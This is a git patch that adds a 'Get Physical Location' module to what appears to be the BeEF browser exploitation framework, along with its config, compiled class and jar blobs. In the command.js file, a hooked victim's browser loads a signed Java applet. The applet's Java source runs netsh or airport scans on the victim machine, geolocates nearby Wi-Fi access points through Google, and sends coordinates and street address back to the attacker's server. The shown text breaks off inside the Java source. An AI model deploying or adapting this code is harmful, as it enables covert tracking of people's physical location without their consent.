From e7dd04977e2275a8ec946eac95f91452446320c6 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 26 Feb 2012 09:53:16 +0100
Subject: [PATCH] Added getPhysicalLocation module written by @keith55.
 Adjusted config.yaml description and browser support.

---
 modules/host/get_physical_location/command.js |  30 +++
 .../host/get_physical_location/config.yaml    |  26 ++
 .../getGPSLocation.class                      | Bin 0 -> 5394 bytes
 .../get_physical_location/getGPSLocation.jar  | Bin 0 -> 4570 bytes
 .../get_physical_location/getGPSLocation.java | 244 ++++++++++++++++++
 modules/host/get_physical_location/module.rb  |  26 ++
 6 files changed, 326 insertions(+)
 create mode 100755 modules/host/get_physical_location/command.js
 create mode 100755 modules/host/get_physical_location/config.yaml
 create mode 100755 modules/host/get_physical_location/getGPSLocation.class
 create mode 100755 modules/host/get_physical_location/getGPSLocation.jar
 create mode 100755 modules/host/get_physical_location/getGPSLocation.java
 create mode 100755 modules/host/get_physical_location/module.rb

diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js
new file mode 100755
index 000000000..b03433e90
--- /dev/null
+++ b/modules/host/get_physical_location/command.js
@@ -0,0 +1,30 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
+    var applet_id = '<%= @applet_id %>';
+    var applet_name = '<%= @applet_name %>';
+    var output;
+    beef.dom.attachApplet(applet_id, 'getGPSLocation', 'getGPSLocation' ,
+       	null, applet_archive, null);
+    output = document.getGPSLocation.getInfo();
+    if (output) {
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output.replace(/\n/g,"<br>"));
+    }
+    beef.dom.detachApplet('getGPSLocation');
+});
+
+
diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml
new file mode 100755
index 000000000..afbb27215
--- /dev/null
+++ b/modules/host/get_physical_location/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_physical_location:
+            enable: true
+            category: "Host"
+            name: "Get Physical Location"
+            description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
+            authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
+            target:
+                working: ["IE"]
+                user_notify: ["C", "S", "O", "FF"]
diff --git a/modules/host/get_physical_location/getGPSLocation.class b/modules/host/get_physical_location/getGPSLocation.class
new file mode 100755
index 0000000000000000000000000000000000000000..3a3756f0b35000c6a824e380cc81f34d1d93f322
GIT binary patch
literal 5394
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
PNL^CATwOyaJc#`VlOk<|

literal 0
HcmV?d00001

diff --git a/modules/host/get_physical_location/getGPSLocation.jar b/modules/host/get_physical_location/getGPSLocation.jar
new file mode 100755
index 0000000000000000000000000000000000000000..0359873674c37bb29af6f98ef752e2d6e47f7427
GIT binary patch
literal 4570
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
S;NE@!=VpoBI2ZZ1zyAZCDI;V6

literal 0
HcmV?d00001

diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java
new file mode 100755
index 000000000..a9ef449cf
--- /dev/null
+++ b/modules/host/get_physical_location/getGPSLocation.java
@@ -0,0 +1,244 @@
+import java.io.*;  
+import java.util.*;
+import java.net.*;
+import java.applet.*;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+// Keith Lee
+// Twitter: @keith55
+// http://milo2012.wordpress.com
+// keith.lee2012[at]gmail.com
+
+public class getGPSLocation extends Applet{  
+	public static String result = "";
+	
+	public getGPSLocation(){
+		super();
+		return;
+	}
+	public static String getInfo() {
+		return result;
+	}
+
+	public void init() {
+		if (isWindows()) {
+			//System.out.println("This is Windows Machine");
+			result=getWindows();
+		} else if (isMac()) {
+			//System.out.println("This is Mac Machine");
+			result=getMac();
+		} else {
+			//System.out.println("Your OS is not support!!");
+		}
+	}
+	
+	public static String getWindows(){
+			String result = null;
+            try {  
+			
+		ArrayList ssidList = new ArrayList();
+		ArrayList bssidList = new ArrayList();
+		ArrayList rssiList = new ArrayList();
+			
+		Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");  
+                
+		BufferedReader in = new BufferedReader(  
+                                    new InputStreamReader(p.getInputStream()));  
+                String line = null;  
+		String signal = null;
+		String ssidStr = null;
+		
+		while ((line = in.readLine()) != null) {  
+			
+			Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
+			Matcher m1 = p1.matcher(line);
+			if(m1.find()){
+				ssidStr = m1.group(2);
+				ssidStr = ssidStr.replaceAll(" ","%20");
+				ssidList.add(ssidStr);
+			}	
+			Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
+			Matcher m2 = p2.matcher(line);
+			if(m2.find()){
+				bssidList.add(m2.group(2));
+			}	
+			Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
+			Matcher m3 = p3.matcher(line);
+			if(m3.find()){
+				signal = m3.group(2);
+				signal = signal.replaceAll("%","");
+				signal = signal.replaceAll(" ","");
+				signal = "-"+signal;
+				rssiList.add(signal);
+			}											
+		}
+
+		int arraySize=ssidList.size();
+		if(arraySize==0){
+			//System.out.println("I don't know where the target is");
+			result="\nI don't know where the target is";
+		}
+		else{
+			result=googleLookup(bssidList,ssidList,rssiList);
+		}
+	         } catch (Exception e) {  
+	        	System.out.println(e.getMessage());
+            }
+			return result;          
+	}
+	
+	public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
+	    try {  
+			int j=0;
+			String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
+			while(j<ssidList.size()){
+				queryString+="&wifi=mac:";
+				queryString+=bssidList.get(j);
+				queryString+="%7C";
+				
+				queryString+="ssid:";
+				queryString+=ssidList.get(j);
+			
+				queryString+="%7C";
+				queryString+="ss:";
+				queryString+=rssiList.get(j);
+				j++;
+			}
+					
+			//Get geocoordinates / Longitude and Latitude
+			String geoCoordinates = null;		
+
+			URL url = new URL(queryString);
+			URLConnection urlc = url.openConnection();
+			urlc.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
+			BufferedReader reader = new BufferedReader(new InputStreamReader(urlc.getInputStream()));		
+			for (String output; (output = reader.readLine()) != null;) {
+				//System.out.println(output);
+				if(output.indexOf("18000.0")>0){
+					result+="\nLocation is not accurate\n";
+					//System.out.println("Location is not accurate\n");
+				}
+				else{	
+					if(output.indexOf("lat")>0){
+						output = output.replace("\"lat\" : ","");
+						output = output.replaceAll("^\\s+", "");
+						geoCoordinates = output;
+						result+="\nLatitude: ";
+						result+=output;
+						//System.out.println("Latitude: "+output);
+					}
+					if(output.indexOf("lng")>0){
+						output = output.replace("\"lng\" : ","");
+						output = output.replaceAll("^\\s+", "");
+						geoCoordinates += output;
+						result+="\nLongitude: ";
+						result+=output;
+						//System.out.println("Longitude: "+output);
+					}
+				}
+				
+			}
+			
+		
+			//Reverse geocoordinates to street address
+			String reverseGeo = "https://maps.googleapis.com/maps/geo?q="+geoCoordinates+"&output=json&sensor=true_or_false";
+			
+			//System.out.println(reverseGeo);
+
+				URL url1 = new URL(reverseGeo);
+				URLConnection urlc1 = url1.openConnection();
+				urlc1.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
+			BufferedReader reader1 = new BufferedReader(new InputStreamReader(urlc1.getInputStream()));		
+			for (String output1; (output1 = reader1.readLine()) != null;) {
+				if(output1.indexOf("address")>0){
+					output1 = output1.replace("\"address\": ",""); 
+					output1 = output1.replace("\",",""); 
+					output1 = output1.replace("\"",""); 
+					output1 = output1.replaceAll("^\\s+", "");
+					result+="\nAddress is ";
+					result+=output1;
+					//System.out.println("Address is "+output1);
+				}
+			}		
+			String mapAddress = "http://maps.google.com/maps?q="+geoCoordinates+"+%28You+are+located+here%29&iwloc=A&hl=en";
+			result+="\n"+mapAddress;
+			//System.out.println("\n"+mapAddress);
+		} catch (Exception e) { 
+			System.out.println(e.getMessage());
+		}
+		return result;		
+	}
+	
+	public static String getMac(){
+		String result = null;	
+        try {  
+                Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");  
+                BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));  
+                String line = null;  
+				String ssidStr = null;
+				String signal = null;
+				
+				String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
+		
+				ArrayList ssidList = new ArrayList();
+				ArrayList bssidList = new ArrayList();
+				ArrayList rssiList = new ArrayList();
+
+				line = in.readLine();	
+				while ((line = in.readLine()) != null) {  
+					line = line.replaceAll("^\\s+", "");
+					
+					Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
+					Matcher m1 = p1.matcher(line);
+					if(m1.find()){
+						ssidStr = m1.group(1);
+						ssidStr = ssidStr.replaceAll(" ","%20");
+						ssidList.add(ssidStr);
+						bssidList.add(m1.group(2));
+						signal = m1.group(3);
+						signal = signal.replaceAll(" ","");
+						rssiList.add(signal);
+					}
+					
+				}
+			int arraySize=ssidList.size();
+			if(arraySize==0){
+				result="\nI don't know where the target is";
+				//System.out.println("I don't know where the target is");
+			}
+			else{
+				result=googleLookup(bssidList,ssidList,rssiList);
+
+			}
+		} catch (Exception e) { 
+			System.out.println(e.getMessage());
+		}  
+		return result;		
+	}  
+
+	public static boolean isWindows() {
+ 
+		String os = System.getProperty("os.name").toLowerCase();
+		// windows
+		return (os.indexOf("win") >= 0);
+ 
+	}
+ 
+	public static boolean isMac() {
+ 
+		String os = System.getProperty("os.name").toLowerCase();
+		// Mac
+		return (os.indexOf("mac") >= 0);
+ 
+	}
+ 
+	public static boolean isLinux() {
+ 
+		String os = System.getProperty("os.name").toLowerCase();
